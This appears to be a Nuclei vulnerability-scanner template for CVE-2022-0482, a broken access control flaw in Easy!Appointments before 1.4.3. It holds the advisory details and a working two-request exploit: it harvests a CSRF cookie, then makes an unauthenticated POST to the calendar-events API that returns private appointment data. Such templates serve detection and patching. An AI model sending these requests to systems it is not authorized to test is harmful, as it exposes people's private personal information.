id: CVE-2022-0482 info: name: Easy!Appointments <1.4.3 - Broken Access Control author: francescocarlucci,opencirt severity: critical description: | Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments. remediation: | Upgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability. reference: - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/ - https://github.com/alextselegidis/easyappointments - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0482 - https://github.com/alextselegidis/easyappointments/commit/44af526a6fc5e898bc1e0132b2af9eb3a9b2c466 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2022-0482 cwe-id: CWE-359,CWE-863 epss-score: 0.06254 epss-percentile: 0.92796 cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: easyappointments product: easyappointments framework: wordpress tags: cve,cve2022,easyappointments,huntr http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Accept: */* - | POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01 cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '"appointments":' - '"unavailables":' condition: and - type: status status: - 200 extractors: - type: kval name: csrf_token internal: true kval: - "csrfCookie" part: header # digest: 490a0046304402200945e6562629f6896b2842895d9a8f1ba6bb38b39a5da392daff9e9b35c6cdc602207fa1a38801857adc748f150aee8aeb6abd747180e9b473e792176078afc1dff6:922c64590222798bb761d5b6d8e72950